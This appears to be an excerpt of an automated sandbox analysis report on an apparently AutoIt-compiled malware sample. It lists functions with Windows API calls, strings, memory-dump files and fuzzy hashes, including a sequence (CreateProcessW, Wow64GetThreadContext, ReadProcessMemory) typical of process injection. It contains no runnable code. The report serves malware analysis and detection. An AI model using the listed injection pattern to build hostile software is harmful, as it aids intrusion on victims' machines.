Opcode ID: 0b4f1cbb18cfb767acc37d2d5100307916a8bf49bc581853fb8807a7d08009b0
Instruction ID: bce2b2df68524a99e2d837ed313c8577dff3934343ac58e7f738685b585ddc33
Opcode Fuzzy Hash: 0b4f1cbb18cfb767acc37d2d5100307916a8bf49bc581853fb8807a7d08009b0
Instruction Fuzzy Hash: A831D031508304AFD732EB60DC46FEB77DCAF44304F50862AF5858A0E5DB709648CBA6

Function 0036686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00364DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00364E0F

_free.LIBCMT ref: 0039E263
_free.LIBCMT ref: 0039E2AA

Part of subcall function 00366A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00366BAD

Strings

Bad directive syntax error, xrefs: 0039E292
>>>AUTOIT SCRIPT<<<, xrefs: 0039E039

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: caa8d8c60f7974c9e43bfe6201a84b3d397f41df2767534ced80b0b8711deac4
Instruction ID: 246b9f00fd833590f6fd5535fa127cdf5788c2ef8c58c58bc2282e0fb0909f3b
Opcode Fuzzy Hash: caa8d8c60f7974c9e43bfe6201a84b3d397f41df2767534ced80b0b8711deac4
Instruction Fuzzy Hash: 6F917D71910219AFCF06EFA4CC919EEB7B8FF18314F10856AF815AB2A1DB71AD05CB50

Function 003635B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003635A1,SwapMouseButtons,00000004,?), ref: 003635D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003635A1,SwapMouseButtons,00000004,?,?,?,?,00362754), ref: 003635F5
RegCloseKey.KERNELBASE(00000000,?,?,003635A1,SwapMouseButtons,00000004,?,?,?,?,00362754), ref: 00363617

Strings

Control Panel\Mouse, xrefs: 003635D2

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 0ccbf5a3262365c73b5a93cb7ae379a8b60968733c627cd1418e107059a14b13
Instruction ID: 6bd489419d3c3ed8422cb44f76042b42cbc3a17954c47e9c461e535b5484b183
Opcode Fuzzy Hash: 0ccbf5a3262365c73b5a93cb7ae379a8b60968733c627cd1418e107059a14b13
Instruction Fuzzy Hash: 79115771614218BFDB22CF68DC80EAEBBBCEF04740F018569F805DB214E2719F409BA4

Function 00E77768 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00E77F23
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E77FB9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E77FDB

Memory Dump Source

Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
Instruction ID: dfe1cb92d46d224f26ce234921644705ebed2e3d9403f2dadc8790ab3aeb56a8
Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
Instruction Fuzzy Hash: 01621C30A14658DBEB24CBA4C954BDEB372EF58300F1091A9D10DFB3A1EB759E81CB59

Function 003C955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00364EE5: _fseek.LIBCMT ref: 00364EFD

Part of subcall function 003C9734: _wcscmp.LIBCMT ref: 003C9824
Part of subcall function 003C9734: _wcscmp.LIBCMT ref: 003C9837

_free.LIBCMT ref: 003C96A2
_free.LIBCMT ref: 003C96A9
_free.LIBCMT ref: 003C9714

Part of subcall function 00382D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00389A24), ref: 00382D69
Part of subcall function 00382D55: GetLastError.KERNEL32(00000000,?,00389A24), ref: 00382D7B

_free.LIBCMT ref: 003C971C

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 1ffa577895b785983435910fbad7f3b613eef6d86ef4971d665a4796a529bb4d
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: 26512BB1D04258AFDF269F64CC85B9EBBB9EF48300F10449EF609AB251DB715E908F58

Function 0038470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003847A0
__flush.LIBCMT ref: 003847C0
__write.LIBCMT ref: 003847F3
__flsbuf.LIBCMT ref: 00384821

Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 5f536ce81fc6121791bbb0591d85efc12f60ed5ab336dc9770998ea1102441e4
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 7B41E634A007479BDF1AEF69C8809AE77A6EF81364B2581BDF825CBE40E771DD408B40

Function 003644A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003644CF

Part of subcall function 0036407C: _memset.LIBCMT ref: 003640FC
Part of subcall function 0036407C: _wcscpy.LIBCMT ref: 00364150
Part of subcall function 0036407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00364160

KillTimer.USER32(?,00000001,?,?), ref: 00364524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00364533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0039D4B9

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 29f6c9934b97cbdeee32ce41991d4abac0794c391274faabd15cc50227228fa6
Instruction ID: 2a7467fb96c510b4d12e7aa21bf7577e624b485726297da926add9d9a2417aa1
Opcode Fuzzy Hash: 29f6c9934b97cbdeee32ce41991d4abac0794c391274faabd15cc50227228fa6
Instruction Fuzzy Hash: A12107709047849FEB338B25984ABE7BBEC9F02314F04409DE79E5B181C7742A84CB51

Function 00364C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00364CBA

Strings

AU3!P/?, xrefs: 00364CB4
EA06, xrefs: 0039D8CC

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/?$EA06
API String ID: 4104443479-2942601680
Opcode ID: 073439a972bf8af85ff808ca8981270441ead085f150eac40f36de6bf2025d90
Instruction ID: 1fd43877a57a9342a21cc5129cc06489106c518e8b3753e7392dd79d5da887e6
Opcode Fuzzy Hash: 073439a972bf8af85ff808ca8981270441ead085f150eac40f36de6bf2025d90
Instruction Fuzzy Hash: 5C414C21E041586BDF239B64C8617BF7FA6DB46300F68C475ED829F28FD6319D4483A1

Function 00367285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0039EA39
GetOpenFileNameW.COMDLG32(?), ref: 0039EA83

Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770

Part of subcall function 00380791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003807B0

Strings

X, xrefs: 0039EA51

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 08e7c50e9c84cc8d975f68b2e12c73088f5e3d4ad25a7e5fc94c340ade763e52
Instruction ID: f05197229de63c03821d0e035311a8b448a0dbf0b19e096cea8beeb08ebf2e9d
Opcode Fuzzy Hash: 08e7c50e9c84cc8d975f68b2e12c73088f5e3d4ad25a7e5fc94c340ade763e52
Instruction Fuzzy Hash: 9D219071A002589BCF52DF94D845BEE7BFCAF49714F00805AE408AB281DBF859898FA1

Function 003C98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 003C98F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003C990F

Strings

aut, xrefs: 003C9909

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: f37f65b28a0601b194858a0e7bf8f79f55787c39532236dd80b09ae3f5146a08
Instruction ID: 3b4dcdedd6529c0b9b9aafea56993148c35565e92ca5376c7f22f703c5fc3ec7
Opcode Fuzzy Hash: f37f65b28a0601b194858a0e7bf8f79f55787c39532236dd80b09ae3f5146a08
Instruction Fuzzy Hash: 16D05E7954030DAFDB60ABA4DC8EFEA773CE704700F0007B1BB54990E1EBB095988B95

Function 003DCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14fbf2fe84fe281921f9a1b000b6b740320a8d30e4f355b905e3aa24fcb395ab
Instruction ID: 9373082971ecb5d8e4107c82cec66502bd88a02844b64342e3198bf61d4578a5
Opcode Fuzzy Hash: 14fbf2fe84fe281921f9a1b000b6b740320a8d30e4f355b905e3aa24fcb395ab
Instruction Fuzzy Hash: C3F138B16183019FCB15DF28D480A6ABBE9FF89314F15892EF8999B351D730E945CF82

Function 0036434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00364370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00364415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00364432

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: f9de4c4213b7f5ee76ce85fd8dc61fbd59fe92b651dc7b2b2838cae9be824b04
Instruction ID: d1ff23cb32d91d49ac15ebc27394f24345fe770eff92e1489eb44f25e50bd257
Opcode Fuzzy Hash: f9de4c4213b7f5ee76ce85fd8dc61fbd59fe92b651dc7b2b2838cae9be824b04
Instruction Fuzzy Hash: FF3191B4A04701CFC732DF25D885A9BBBF8FB48309F00493EE59A86291E770A944CB56

Function 0038571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00385733

Part of subcall function 0038A16B: __NMSG_WRITE.LIBCMT ref: 0038A192
Part of subcall function 0038A16B: __NMSG_WRITE.LIBCMT ref: 0038A19C

__NMSG_WRITE.LIBCMT ref: 0038573A

Part of subcall function 0038A1C8: GetModuleFileNameW.KERNEL32(00000000,004233BA,00000104,?,00000001,00000000), ref: 0038A25A
Part of subcall function 0038A1C8: ___crtMessageBoxW.LIBCMT ref: 0038A308

Part of subcall function 0038309F: ___crtCorExitProcess.LIBCMT ref: 003830A5
Part of subcall function 0038309F: ExitProcess.KERNEL32 ref: 003830AE

Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28

RtlAllocateHeap.NTDLL(00DF0000,00000000,00000001,00000000,?,?,?,00380DD3,?), ref: 0038575F

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 32f07cfdee57f52e9792b64e64da774349c5a4c70a40a35a4b6d4488d3bf08ee
Instruction ID: 62a69dcd647fced57177c00f0697de00f798e7739de1bbeb6853785cc8d9e51e
Opcode Fuzzy Hash: 32f07cfdee57f52e9792b64e64da774349c5a4c70a40a35a4b6d4488d3bf08ee
Instruction Fuzzy Hash: C101B175340B01DAE6233B38EC82A2E739C9B82762F6145FAF5059E2C1DFB49C414765

Function 003C98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,003C9548,?,?,?,?,?,00000004), ref: 003C98BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003C9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003C98D1
CloseHandle.KERNEL32(00000000,?,003C9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003C98D8

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 070aa61eeef2d7fdb7edc87070267b15dc0112d98e2f3a6396458671afe95181
Instruction ID: 6135cbd23bc18e7fe1cd8876873d322a6cf0d9cd3287494e59688c9c177b3d3c
Opcode Fuzzy Hash: 070aa61eeef2d7fdb7edc87070267b15dc0112d98e2f3a6396458671afe95181
Instruction Fuzzy Hash: 29E04F32140218BBDB321B54EC49F9A7B19AB06761F118220FB14A90E087B119119798

Function 003C8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 003C8D1B

Part of subcall function 00382D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00389A24), ref: 00382D69
Part of subcall function 00382D55: GetLastError.KERNEL32(00000000,?,00389A24), ref: 00382D7B

_free.LIBCMT ref: 003C8D2C
_free.LIBCMT ref: 003C8D3E

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: f5f8503ce71bb0d127822cfdf3c775b001977c6d61ee6abb72f20e7657a38a92
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: DFE012B1601B014ACB26B678AA44F9357EC4F98352715095DB41EDB186CE64FD468324

Function 0036A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0039FC01

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 8a2bd71877d8ec7f43edb8e82214301983a18340d2426ea9cf61d9766fc74d41
Instruction ID: c1594d96c9514b29438dbbf19723f670dd3294be334bf64b5be33c037053a66c
Opcode Fuzzy Hash: 8a2bd71877d8ec7f43edb8e82214301983a18340d2426ea9cf61d9766fc74d41
Instruction Fuzzy Hash: 44225670508700DFCB26DF24C490A6ABBE5BF85304F15C96DE88A9B666D735EC85CF82

Function 003C77B3 Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003C78DB

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 059574cf47bda8725b60555c6bc87727ac0702e8c5106250e102d0fb1eb030cd
Instruction ID: 738e4847515845eba7a1ed2c095a9496eba8d27a753ea82b3fd15ff235e2d18e
Opcode Fuzzy Hash: 059574cf47bda8725b60555c6bc87727ac0702e8c5106250e102d0fb1eb030cd
Instruction Fuzzy Hash: F641D5715087059BCB16EFA8D886EBAB7E8EF09300B24445DE685DB342DF35AD05DB60

Function 00367A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00367AAB
_memmove.LIBCMT ref: 00367B16

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: aa52f996f6a1e8cebf2e93e85435818c4b1739226e09e342898e130c21d93d86
Instruction ID: 104a360ddf9b9cecb89ceb5e3ef0003d9ff947073bd2b875999681f6295c7868
Opcode Fuzzy Hash: aa52f996f6a1e8cebf2e93e85435818c4b1739226e09e342898e130c21d93d86
Instruction Fuzzy Hash: 1431D4B1604A06AFC705DF68C8D1E69F3A9FF48324755C629E429CB791EB30E924CB90

Function 00380DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0038571C: __FF_MSGBANNER.LIBCMT ref: 00385733
Part of subcall function 0038571C: __NMSG_WRITE.LIBCMT ref: 0038573A
Part of subcall function 0038571C: RtlAllocateHeap.NTDLL(00DF0000,00000000,00000001,00000000,?,?,?,00380DD3,?), ref: 0038575F

std::exception::exception.LIBCMT ref: 00380DEC
__CxxThrowException@8.LIBCMT ref: 00380E01

Part of subcall function 0038859B: RaiseException.KERNEL32(?,?,?,00419E78,00000000,?,?,?,?,00380E06,?,00419E78,?,00000001), ref: 003885F0

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

